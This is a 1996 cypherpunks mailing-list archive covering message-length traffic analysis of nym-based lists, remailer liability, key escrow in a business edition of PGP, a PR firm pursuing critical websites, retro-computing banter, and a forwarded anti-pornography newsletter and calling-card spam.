I hope that cypherpunks will appreciate how the problem alluded to points
out a weakness in C2's current nym scheme, which is especially exploitable
in the context of general nym based mailing lists being run via similar
servers. ] 

The proposal for a Hackerpunks nym based mailing list is interesting,
however, there are some concerns regarding the susceptibility of the list
to traffic analysis.

The contents of the list will clearly not be secret since anyone can create
a C2 nym and then subscribe. For a given bag of messages, B, let L(B)
denote the bag of the lengths of the messages in B. (A length, x, appearing
n times in L(B) if and only if there are n messages of length x in B.) Let
B_x denote the bag of messages that subscriber x receives. If for any two
subscribers, a and b, L(B_a)=L(B_b), then someone cooperating with many
ISPs could easily guess who was and was not subscribed to the list by
seeing if a customer received a bag of messages, M, with L(M)=L(the bag of
messages actually posted to the list). A solution to this might seem to be
to append to each message posted to the list a pad varying randomly in
length between each subscriber who was to receive a copy.  However, if the
list ownership ever feel into evil hands, the lengths of the pads could be
chosen non-randomly, and thus provide very convincing evidence that someone
receiving messages of the non-randomly chosen lengths was the owner of the
given nym.

There is also a concern that the owner of Hackerpunks could be discovered
with a traffic analysis similar to the one used to determine list
subscribers. This time, let P be the bag of messages (with padding deleted)
posted to the list. If someone were to watch to see if some node on the
Internet received a bag, I, with L(I)=L(P), then that person could guess
that that node had a user who was the owner of the Hackerpunks mailing
list. As before it would, of course, not help the owner of Hackerpunks to
ask their subscribers to help weaken this attack by padding their messages
to random lengths, since a malicious enemy could then determine a
non-random sequence of messages lengths and send the corresponding message
to owner of Hackerpunks for posting. This would only increase the
likelihood that a node receiving those messages had a user who was the
owner of the Hackerpunks mailing list. 

The solution to the two dilemmas seems to be to ask that the C2 re-mailing
code be modified so as ensure that each messages is padded to a fixed size
before encrypting and being sent through the reply block. On the other
hand, this would give away information that anyone receiving messages of
this fixed length was likely the owner of some C2 nym.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <printing@explicit.com>
Date: Sat, 15 Jun 1996 15:01:20 +0800
To: cypherpunks@toad.com
Subject: Level30 Newsletter (fwd)
Message-ID: <Pine.BSD.3.92.960614025524.25568B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------

Recently, you requested from our email autoresponder a copy of
The Agincourt Project.  You were not alone.  That document has
made its way around the world.  Law enforcement agencies, public
officials, prosecutors, ISP's and concerned citizens have all been
reading it.

And it has made a difference.  Illegal obscenity and child pornography
IS being removed from the Internet.

And now that the first round of the CDA legal battle is over, and
the focus in the battle against Internet pornography will change
back to the enforcement of local obscenity and child pornography laws.

But the issues are complex, and a single document is just not enough
to keep the public informed.  And so we have started Level30.

Since you had an interest in The Agincourt Project (whatever your
position on it), we thought you'd be interested in Level30.

To receive this biweekly (or more frequently) newsletter, simply send
an e-mail message

     To:  majordomo@databack.com
     Subject:  (leave blank)
     Message:  subscribe level30

About the Purpose - To instruct families on how to safely use the
Internet, and to inform families, law enforcement, the media and
other interested Internet organizations about breaking news in the
fight to keep illegal pornography and child pornography OFF the Internet.

About the Title - This is the Offense Level mandated by the United States
Sentencing Commission for the trafficking of child pornography often
found on the Internet in Usenet newsgroups.  (Base offense level - 17;
if the material involves a prepubescent minor, increase by 2 levels; if
the offense involves distribution, increase by at least 5 levels; if the
offense involves material that portrays sadistic or masochistic conduct
or other depictions of violence, increase by 4 levels; and if a computer
was used to transport or ship the visual depiction, increase by 2 levels.)
(The Sentencing Table can be found at http://www.ussc.gov.)

About the Author -  Paul D. Cardin, P.A

     Member of the Board of Directors of Oklahomans for Children And
         Families (OCAF)
     Author of The Agincourt Project - the electronic expose that explains
         how Internet Service Providers (ISPs) are responsible for the
         distribution of illegal pornography and child pornography
         throughout America.
     Architect of the most effective and successful campaign in the United
         States today to stop the electronic distribution of illegal
         pornography and child pornography.
     Former officer in the Oklahoma Civil Liberties Union

About the Regular Features -

     America's Most Wanted - A list of public corporations that are the
          enemies of America's children and families because of their
          continued electronic distribution of illegal pornography and
          child pornography.
     (Your State Here)'s Most Wanted - A state by state list of ISPs that
          are the enemies of children and families because of their
          continued electronic distribution of illegal pornography and
          child pornography.
     Commentary - Incisive and hard hitting analysis of the legal and
          constitutional issues facing the Internet today.
     Battle Reports - Updates from the front lines, from "war
          correspondents" across the country-
            The court battles over the Communications Decency Amendment.
            The status of OCAF against the Oklahoma ISPs.
            The status of Loving v. Boren - is it a ridiculous waste of
               taxpayers money or will it be the definitive Internet
               court ruling?
          The status of other important electronic obscenity court cases.
          The status of battles yet to be engaged.
     Special Reports -
          Testimonies from the victims of pornography.
          Profiles of the men and women  who are engaged in the battle to
               free our society from its plague.
          Interviews with law enforcement officers, prosecutors, and ISPs.

You should subscribe to Level 30 if:

     You are an INTERNET SERVICE PROVIDER who wants to stop violating
          federal and state obscenity and child pornography laws.
     You are a LAW ENFORCEMENT OFFICER or PROSECUTOR who wants to learn
          how to stop ISPs from violating federal and state obscenity
          and child pornography laws
     You are a PUBLIC OFFICIAL who wants to learn how to keep illegal
          pornography and child pornography off of publicly owned and
          operated computer systems.
     You are a UNIVERSITY OFFICIAL or LIBRARY OFFICIAL who wants to learn
          how to keep illegal pornography and child pornography off of
          your university or library computer system.
     You are a SCHOOL OFFICIAL or TEACHER who wants to learn how to keep
          illegal pornography and child pornography off of your school's
          computer system.
     You belong to a CHILD ADVOCACY or WOMEN's RIGHTS group and you want
          to learn how to fight illegal pornography and child pornography
          on the Internet.
     You belong to a CHURCH or RELIGIOUS GROUP and you want to learn how
          to fight illegal pornography and child pornography on the
          Internet.
     You are a CORPORATE EXECUTIVE or PR OFFICER who wants to learn how
          to avoid extremely damaging publicity for your company.
     You are a REPORTER who wants to stay one step ahead of the above.

     Or, finally.......

     You are a PARENT or GRANDPARENT who wants to learn more about how to
          keep the Internet safe for your children and/or grandchildren.

 Thank you for your time.


--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Sat, 15 Jun 1996 13:26:53 +0800
To: cypherpunks@toad.com
Subject: Mission Anonymous / U.S. News & World Report
Message-ID: <m0uUU6j-000rQEC@maki.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


June 17, 1996 U.S. News & World Report 
Newswatch,  Page 76

Mission Anonymous

Very good write up on Community ConneXion's Anonymizer,
and on new features offered at the Center for Democracy and 
Technology.  

William Knowles
Graphically Explicit

//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
  Graphically Explicit                     
  Printing - Advertising - Interactive  
  1555 Sherman Avenue - Suite 203          
  Evanston IL., 60201-4421                 
  800.570.0471 - printing@explicit.com
  Accept, Embrace, Adapt, Create     
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 14 Jun 1996 17:28:59 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Insults (was: PBS show)
In-Reply-To: <Pine.SUN.3.91.960613110936.2157D-100000@tipper.oit.unc.edu>
Message-ID: <Pine.3.89.9606140305.A10802-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


	Simon:

On Thu, 13 Jun 1996, Simon Spero wrote:

> On Thu, 13 Jun 1996, Bill Frantz wrote:
> > At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
> > >I personally despise the term "nerd," but I won't get into that here.
> > >(Except to say that "nerds," "geeks," and "dweebs" are terms of insult,
> > IMHO the best way to deal with an insult is to make it a badge of pride. 
> Geek Pride! Yes! Time to start Hacked-Up!
> "We're Freaks! We're Geeks! We've got RSA, Get Used To It"

	Note in passing that both "Baptist" and "Mormon" were 
	originally terms of insult heaped on members of those
	respective faiths.  

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 14 Jun 1996 17:45:59 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: PBS show
In-Reply-To: <199606131636.JAA22527@mail.pacifier.com>
Message-ID: <Pine.3.89.9606140311.A10802-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Thu, 13 Jun 1996, jim bell wrote:

> But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 

	I liked my Apple 2e, which had most of the faults you mention.
	And the editor had for it had one feature I haven't seen on any
	editor since.  	

> And by refusing to build Masatoshi (?) Shima's design for the Z-80, they 

	The number one selling computer with a Z-80 chip inside was
	also the number one computer platform which ran CP/M which was
	The Apple 2e.
	
	<< Yes, the Z-870 chip was a third party add on. >>	

> I have other, even harsher word for the design of the IBM PC.  Oh yes, the 
> Mac sucks bigtime as well, although primarily for legal reasons.

	Mainly because it has what has to be the world's most user
	hostile computer interface ever dreamed up, until Win95
	came on the scene.  

        xan

        jonathon
        grafolog@netcom.com

**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 15 Jun 1996 11:47:40 +0800
To: cypherpunks@toad.com
Subject: [noise] (was Re: PBS show)
Message-ID: <199606141238.FAA07609@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


at Thu, 13 Jun 1996 11:30:44 -0800 jim bell <jimbell@pacifier.com> may have written...

>Brain-dead segmented architecture, 64k per segment limitation
code segments, ever hear of code segments?  Data segments maybe?  Ever
actually do any 8086 assembler?  You would have liked them.  In fact,
even the MAC's O/S had them built in as I recall, just not a hardware
limitation with the 68000.  A good programmer was not limited by these.

>1-megabyte memory limitation.  The only thing that made it 
OK, I concede here... But if you actually write code instead
of pasting code together, 1MB is plenty of RAM with this
processor.  What was brain dead was the fact that IBM in it's
infinite wisdom "stole" near half of that for it's poor hardware
designs (640k-1MB range).

flames > /dev/nul
---
Joseph L. (Joe) Moll, Greenville, SC  USA  mailto:oolid@acqic.org
---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: quax@interserv.com
Date: Sat, 15 Jun 1996 10:09:15 +0800
To: cypherpunks@toad.com
Subject: National DNA Data Bank
Message-ID: <199606141410.AA27783@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times today writes on a report to be released today on the 
establishment of a national DNA data bank to parallel the national fingerprint 
system. The DNA system was authorized in a little-noted provision of the 1994 
Crime Control Act.

The article states that one of the DNA system's main advantage over 
fingerprinting will be in identifying sexual and other bodily assault criminals 
who leave tell-tales, as well as in correcting victims' sometimes faulty 
identification of innocents.


Some civil libertarians are critical of the project as invasive of privacy.

Law enforcement officials and others applaud it, two of whom are OJ's former 
attorneys, Barry Scheck and Peter Neufeld, who run the Innocence Project, a 
program which uses DNA testing to help free those falsely convicted.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <scott.harney@bigeasy.com>
Date: Sat, 15 Jun 1996 12:35:54 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmerman/Viacrypt
Message-ID: <199606141429.IAA01962@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From: Steve Reid <root@edmweb.com>
> 
> > Phil disagrees with ViaCrypts new "business" version of PGP which
> > apparently encrypts all messages with an employer-supplied public key
> > in addition to any specified by the employee.
> 
> Looking at Denning's critique (pro-escrow rant) of the NCR crypto report, 
> she mentioned that mutant version:
> 
> [http://www.cosc.georgetown.edu/~denning/crypto/NRC.txt]
>   "Other corporations are similarly adopting products with data recovery 
>   capabilities as they integrate encryption into their systems (even PGP 
>   comes with data recovery in Viacrypt's Business Edition)."
> 
> IMHO Phil Zimmerman has good reason to object to the mutant version, if
> it's going to cause the PGP name to somehow endorse escrow. 

I don't have a problem with companies escrowing keys or using a 
function like that described for Viacrypt's for official company 
business.  

Employees should be made fully aware, however, that their 
communications are being copied to a company archive.  There should 
be no illusion about the privacy of company communications using 
company-owned software.

For private communications, they should still use a personal copy of 
PGP or other encryption software of their choice.

$.02

me 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcFkO6b3EfJTqNC9AQFO5QP+N80T9b9qezlnf15hNsc9lIJoMihNVo/1
8d7bK8Hv4HSAc0FicP9JRSU7jKhm4nTDR0XUnmMeEFLEvq6ari1GdYr9K/HFcIWW
AtgC9MGGMqAoCIrMt1oOm9WosrfQcNQfij5ENC8lZlWW01y9YXhXpP9CzcsZmNlz
3rjA7c70MuQ=
=JUw7
-----END PGP SIGNATURE-----
------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                             59 0A 01 E3 AF 81 94 63 
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 15 Jun 1996 11:46:15 +0800
To: Cyperpunks Mailing List <cypherpunks@toad.com>
Subject: Remailer Operator Liability?
Message-ID: <Pine.NEB.3.93.960614082823.392A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


	Now that the CDA decision has been made, I was wondering how this
would affect the liability status of the various remailer operators? In
the past several remailers have opted to discontinue service due to
legal/political pressure. Will this CDA decision help to decrease remailer
operator liability?

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 15 Jun 1996 11:42:51 +0800
To: cypherpunks@toad.com
Subject: CALL FOR PAPERS
Message-ID: <v03006f03ade712676db2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 13 Jun 1996 17:39:13 -0700
From: Taher Elgamal <elgamal@netscape.com>
Mime-Version: 1.0
To: ipsec@TIS.COM, ietf-pkix@tandem.com
Subject: CALL FOR PAPERS
Sender: ipsec-approval@neptune.tis.com
Precedence: bulk

CALL FOR PAPERS


Multimedia Data Security

Part of IS&T/SPIE's 1997 Symposium on
Electronic Imaging: Science & Technology
8-14 February 1997
San Jose Convention Center
San Jose, California   USA

Conference Chair: Taher Elgamal, Netscape Communications

The growth of the use of public networks as the platform for multimedia
applications in the past year has made it important to devise mechanisms for
ensuring proper use of intellectual property, and increased the importance
of employing security mechanisms for video and audio data. This conference
will serve as a forum for the exchange of ideas in the areas of security
systems and mechanisms especially in applications that handle large data
volumes.

Papers are solicited in all areas of security systems and algorithms
including but not limited to:

* security systems for imaging applications
* security systems for real-time video applications
* performance studies and comparisons for securing image data
* watermarking and detection of fraudulent copying of intellectual property
* metering schemes for intellectual property usage
* audio and video encryption mechanisms
* key management and security protocols for broadcast applications
* payment systems for online multimedia applications
* content protection mechanisms for online multimedia distribution.

This conference is just one of nearly 30 conferences to be held at the EI'97
symposium. And EI'97 is one of 4 collocated symposia (Electronic Imaging,
Biomedical Optics, Lasers and Applications, and Optoelectronics).

Watch SPIE's web site for the entire Photonics West Call for Papers (late
May-early June):
http://www.spie.org/web/meetings/meetings_home.html

For a printed call for papers or other information:
E-mail: pw97@spie.org
Fax: 360/647-1445
Phone: 360/676-3290

DEADLINES
Paper Abstracts (for review) Due from Authors:
     15 July 1996

Camera-Ready Abstracts (from accepted authors) Due:
        18 November 1996

Manuscripts Due from all Authors:
     13 January 1997

GUIDELINES FOR SUBMITTING AN ABSTRACT

Send a 500 word abstract of your paper, by 15 July, in ONE of
the following ways:

>>electronic mail in ASCII format (NOT encoded) to abstracts@spie.org
>>The SUBJECT line must include: EI97 (Elgamal)
         (Send one submission per email message.)
Note: There will also be available an interactive abstract submission form
on the web site.

>>mail (please mail 4 hard copies) to:     IS&T/SPIE Electronic Imaging '97
     SPIE, P.O. Box 10, Bellingham, WA  98227-0010
     Shipping Address: 1000 20th Street, Bellingham, WA  98225
     Telephone: 360/676-3290

>>fax to SPIE at 360/647-1445     (Please send one submission per fax.)

Be sure each abstract includes the following:

1. CONFERENCE CHAIR and CONFERENCE TITLE (submit to ONLY ONE conference)
     to which the abstract is submitted

2. AUTHOR LISTING (List principal author first)
     for each author: full name [first(given) last(family] and affiliation,
     mailing address, phone/fax numbers, email

3. ABSTRACT/PAPER TITLE

4. ABSTRACT TEXT: 500 words typed on white paper

5. KEYWORDS: maximum of 5 keywords

6. BRIEF BIOGRAPHY of the principal author: 50-100 words
--
Taher Elgamal	    elgamal@netscape.com
Chief Scientist, Netscape Communications
(T) 415 937 2898, (F) 415 428 4054

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 15 Jun 1996 10:10:28 +0800
To: cypherpunks@toad.com
Subject: PR Firm To Tame Net
Message-ID: <199606141558.IAA20308@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone on this list read the SF Chronicle article a few days ago about a
PR firm, that "tames rogue Web sites".  It monitors the Web for these sites,
finds the people who created them and tries to convince them to go offline.
"if gentle persuasion doesn't wprk", said the founder, "you need to bring in
the lawyers".  He gives the example of a Kmart Sucks site, created by a
disgruntled employee, and the First Boston site where a former employee
published proprietary salary figures...I guess he doesn't know that making
derogatory comments is LEGAL.

You know, we were talking these days about the Net putting the masses back
in mass media...this guy says these days are over.  His e-mail address is
m.a@ix.netcom.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 15 Jun 1996 10:02:12 +0800
To: cypherpunks@toad.com
Subject: PR firm...
Message-ID: <199606141714.KAA25918@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


sorry guys,

his e-mail is pr@middleberg.com...just in case you want to send him a
message...maybe you know of rogue web site that need to be closed down,
censored, pushed behind an Iron Curtain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 15 Jun 1996 10:13:33 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Clinton Backs Internet 'Decency Act'
In-Reply-To: <9606131809.AA28987@rpcp.mit.edu>
Message-ID: <Pine.GUL.3.93.960614103434.22241D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Joseph M. Reagle Jr. wrote:

> At odds with what gore said.....
>                          
> >         WASHINGTON (Reuter) - President Clinton says the  
> >Communications Decency Act is a legal way to protect children 
> >from online obscenity, despite a three-judge panel's ruling that 
> >blocks large parts of the act. 
> >         ``I remain convinced, as I was when I signed the bill, that  
> >our Constitution allows us to help parents by enforcing this Act 
> >to prevent children from being exposed to objectionable material 
> >transmitted through computer networks,'' Clinton said in a 
> >statement Wednesday. 

This is also at odds with what Clinton said. The full text of the statement
is available on whitehouse.gov, among other places.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 15 Jun 1996 10:28:53 +0800
To: cypherpunks@toad.com
Subject: PR
Message-ID: <199606141733.KAA27294@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


> Public Relations
> 
> --------------------------------------------------------------------
> 
> From           xopher@ptd.net
> Organization   ProLog - PenTeleData, Inc.
> Date           Thu, 13 Jun 1996 00:43:02 GMT
> Newsgroups     alt.fan.unabomber
> Message-ID     <4pnobp$1lh@ns2.ptd.net>
> 
> --------------------------------------------------------------------
> 
> PR firm declares war on 'rogue' Web sites
> 
> Copyright (c) 1996 Nando.net
> Copyright (c) 1996 The Associated Press
> 
> SAN FRANCISCO (Jun 10, 1996 10:23 a.m. EDT) -- To advertisers and
> activists, the Internet is
> nirvana -- unlimited space and the chance to get their message to the
> world. To the public relations
> firm of Middleberg and Associates, it's a potential nightmare.
> 
> Before the World Wide Web, people unhappy with individual companies
> were reduced to
> convincing a news organization they had a legitimate gripe or standing
> around handing out leaflets at
> corporate headquarters.
> 
> Now, all it takes is a weekend coding some HTML files and every
> complaint or concern they've
> ever had is instantly available to millions.
> 
> "There was the 'Kmart Sucks' site, created by a disgruntled employee
> who was saying a lot of mean
> and nasty things about Kmart. Then there was the First Boston site,
> where a former employee
> published proprietary salary figures," said Don Middleberg, whose firm
> protects its clients from
> attacks on the Internet.
> 
> "Companies spend small fortunes to create a brand image and something
> called good will," he said.
> "These sites are actively destroying them."
> 
> To counter the threat, Middleberg's firm monitors the Web for what he
> calls "rogue" sites, then finds
> the people who created them and attempts to convince them to go
> off-line.
> 
> "If gentle persuasion doesn't work," he said from his New York office,
> "you need to bring in the
> lawyers."
> 
> Over and above First Amendment concerns, threats of legal action are a
> long way from the golden
> vision of the Web as an democratic leveler rhapsodized about by Howard
> Rheingold, who has
> written several books about the ethos of the Internet.
> 
> "The Internet puts the masses back in mass media. It lets anyone
> publish their manifesto for all the
> world to read," Rheingold said from his home near San Francisco.
> 
> Those days are over, countered Middleberg.
> 
> "Rheingold's perceptions of where things are might have been true a
> few months ago," he said. "But
> this is big business. Things have changed. This is no longer a cottage
> industry. Companies have spent
> millions of dollars on this. They're going to fight to protect their
> sites."
> 
> "If the lawyers decide to go after someone and a company is willing to
> spend the dollars, they
> certainly can threaten and make life very difficult for people."
> 
> It's legally unclear, however, how much power companies actually have.
> Merely making derogatory
> comments is not illegal, said David Maher, co-chair of the
> subcommittee on Internet Trademark
> Issues of the International Trademark Association.
> 
> "If you have an individual who doesn't like Ford motor cars or Burger
> King and says rude things
> about them, the First Amendment provides quite a shield. Just because
> people are saying bad things
> about you, you can't necessarily stop them," he said.
> 
> Not only is truth a defense against libel, but trade libel law
> requires that a company must show it
> actually has been damaged, a higher standard than individuals, who
> must show only that their
> reputations have been damaged, Maher said.
> 
> But legal or not, even the threat might be enough to shut down smaller
> sites, said Jonathan Hall, a
> spokesman for the environmental group Greenpeace -- which maintains an
> active Web site.
> 
> "I wouldn't be surprised if people gave in if they got a call and were
> told to 'remove this or there will
> be legal action.' They might do it because they don't know their legal
> rights," he said.
> 
> Greenpeace does, which is probably why the association of nuclear
> energy producers Middleberg
> recently spoke to considers it such a threat.
> 
> "They are scared to death of groups like Greenpeace, who are very
> clever in how they use the Net
> to get a message out," Middleberg said.
> 
> Not unexpectedly, Middleberg won't name his clients, though he says
> he's added eight to the list in
> the last six months.
> 
> Other public relations firms say they haven't heard of anyone using a
> similar strategy. Curtis Kundred
> of Fleishman Hillard International Communications deemed it a
> short-run approach that will backfire
> in the end.
> 
> "I would hope it's not the job of a public relations firm to muscle
> someone into backing down from
> expressing their beliefs online," added Amy Oringel of InterActive
> Public Relations Inc.
> 
> Up until now, the Web has provided a level playing field, a place
> where "Joe Schmoe can have just
> as much credibility as CNN," said writer Martin A. Lee, whose book
> "Unreliable Sources" was an
> expose of the public relations industry.
> 
> "Money is the great unleveler in this equation," he said. "We seem to
> be in the crux of a shift, when
> the whole equilibrium is shifting from 'a thousand flowers blooming'
> to a corporate market. It's
> disturbing."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sat, 15 Jun 1996 10:07:31 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <9606141444.AA13836@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 6/13/96 -0700, Timothy C. May wrote:

>The comments about the floppies (" VERY SMALL capacity floppies (which were
>very slow as well") is even more off-base. In fact, it was probably Apple's
>ability to put _any_ kind of floppies on the Apple II, for a reasonable
>price, that ensured its success.

        Just commenting on the niceness of the existence of floppies, I
remember when I got a floppy for the C-64 I was floored. I'd been dumping my
code to audio tape (record it once, change the volume a little, record it
again, change the treble a little, etc. about 3 times to be sure it was on
the tape) for years! Even the c-64's slow drives were FAST in comparison to
sitting by the tape recorder listening for a break in screechy noise to hear
me say "pong 3" or something. <grin> I could store 10 tapes worth of stuff
on a floppy nearly instaneaously, and access it randomly! And once I got the
little cartridge (mach 5) which blanked the screen during floppy access (one
of the major reasons, among other things, the c-64 was so slow) it was like
lightening... <smile>
_______________________
Regards,            The lust for comfort murders the passions 
                    of the soul. -Kahlil Gibran
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 15 Jun 1996 11:26:28 +0800
To: cypherpunks@toad.com
Subject: SMARTcards, free 800 number GUARANTEE PRIVACY!!!
Message-ID: <Pine.GUL.3.93.960614111007.22241H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The latest spam to hit my mailbox...

-rich

---------- Forwarded message ----------
Date: Fri, 14 Jun 1996 10:27:33 -0700
From: nta@pwrsite.com
Subject: The INTELECARD - FREE 800#

Check out the BUSINESS BUILDER PWRsite at:

http://www.pwrsite.com  -  Great business products and opportunities PLUS FREE Classified ads !!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks for your Interest about the FREE 800# with the NTA Intelecard !!  

If you would like the Complete info pak mailed to you - Please Email me your Postal Address. Please Specify if you're also interested in becoming a Distributor for this Free 800 #.  Email your Address to:

kal@pwrsite.com             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The complete info on the NTA Intelecard is also available on our Fax-on-demand at:

703-904-9888  box #  883

The Complete details about  becoming a  NTA Free 800# Intelecard Distributor(make BIG $$)  is available from our Fax-on-Demand at:

703-904-9888  box# 884

or Call Toll Free at:

800-935-5171  ext. 1171 (24 hr recorded message)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here is the info on the NTA Intelecard and Order form.  You can also order on-line at:

http://www.pwrsite.com

or 

http://www.disneygroup.com   



                           An Open Letter to Business Owners
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                     "Here's The Information You Requested About Your
                                    Free 800 Telephone Number"

Dear Friend:

In todays Competitive Business Environment an 800# is no longer a luxury.

It's an Absolute Necessity!

Unfortunately even modest volume 800# responses can tie up your office
phone and monopolize your staff's time at all the wrong moments. 

The alternative --- a remote 800# voice mail service --- is the ideal
solution. 

Except for one small detail: they cost at least $25.00 per month plus 18-22
cents per minute. That's $300.00 per year plus an outrageous charge per
minute for all usage!

Compare that to the BEST 800# Phone Deal in the country!

 * Set-up Fee                        	$0.00
 * Monthly Service Charge	$0.00
 * Term Commitment	None	
 * Annual Fee		None	
 * Cost Per Minute		.11/min  (Even lower, if you move fast - see                                                                               below)

This 800# service is yours absolutely FREE when you get your own
InteleCard(sm) --- the most advanced portable business
Telecommunications Center imaginable. 

It's a Virtual "Pocket Office" which puts you right in the thick of the most
Advanced Telecommunications Technology. 

Your incredible "Smart Card" will make the world believe you are sitting at
the helm of a giant multi-national conglomerate! 

This exceptional 800# service puts the control in your hands! 

You can either have the messages captured by your personal voice mailbox
or you can re-route the calls to ring directly into your office or home. 

The choice is yours! 

You can change your mind anytime, anywhere you want --- even have your
calls follow you as you travel!

The InteleCard(sm) does it all for you!

          * Sends, Stores and Retrieves Faxes!
          * Broadcasts Messages!
          * Call Forwarding --- Never miss an important call again!
          * Instant Conference Call Capability --- Up to 70 people worldwide!
          * Message/Pager Notification & Delivery!
          * Speed Dialing --- Program up to 99 numbers!    
          * And...Free 800# Service --- Your personal box accessed through
            your private PIN number!
          * Plus MORE !!

Plus..."The Best Pre-Paid Calling Card In The Business"

          * Only $.22 per minute U.S. (17.5 if you move fast!) 
          * Excellent, low International rates!

Simply put...

 "This Is The Best Telephone Deal You will Ever Get...Period!" 

But, it's not going to be here for long. 

The exceptionally Low Introductory, Promotional rates illustrated above are
only in effect through the 21st of June. After that, normal retail rates
apply. The 800# service goes up to .11 per minute and the calling card
charge increases to .22 per minute. 

But if you order your card before the deadline, your rates are grand-
fathered in for life! 

That means, no matter how high the rates may rise for other subscribers,
you have locked in your bargain basement prices for as long as you have
your card. 

There is a very limited supply of these deeply-discounted, promotional
cards available. Once they are gone, no more will ever be offered again.

                     "Your No-Risk, Unconditional Guarantee"

Inspect your InteleCard(sm) for 30 days entirely at our risk. Closely examine
every one of its exceptional features. Calculate the hundreds of dollars it
will save you year after year. Carefully weigh its unmatched convenience
and ease of use. Then, if for any reason you don't agree it is far and away
the best telecommunications deal you ever made, simply return the unused
card for an immediate refund. No questions asked. 

What could possibly be more fair?

                                      The InteleCard(sm)

                Are You Really Ready For All The Extra Business
                               These Services Will Get You?

